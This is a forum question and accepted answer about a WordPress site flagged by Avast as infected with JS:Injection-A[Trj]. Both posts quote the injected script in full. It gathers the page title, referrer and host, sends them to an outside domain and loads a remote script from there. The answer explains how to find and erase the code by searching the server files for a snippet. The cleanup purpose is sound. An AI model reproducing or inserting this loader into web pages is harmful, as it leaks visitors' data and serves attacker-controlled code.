# Avast gives error of JS:Injection-A[Trj] on my website

Tags: javascript, php, wordpress, trojan

Today I got a warning from Avast when I wanted to enter to my website:
forumhan.com.

To understand this you must have Avast on your computer.

My website was infected with JS:Injection-A[Trj] — that's why it wasn't showing.

And when I look, I found this on my header:

```
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://vkza.tora.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
```

As I am not a professional, I cannot understand if there is any relation with other files.

Is there any call to other files in this code?

Does removing this solve the problem or not?

I removed it, but I cannot see my webpage.

Answer (score 2, accepted):

I've found the solution.

The problem is what you are saying. Someone injected that code to your website (and mine also). So what I've done is pick this snippet:

```
encodeURIComponent(document.title)
```

and search in **htdocs** folder in all the files with Notepad++ on the server.

Then I've found something like this:

```
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://delicefilm.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
```

in here:

[image]

And I have erased it from all the files. And that's all!

Hope it works for you too! :)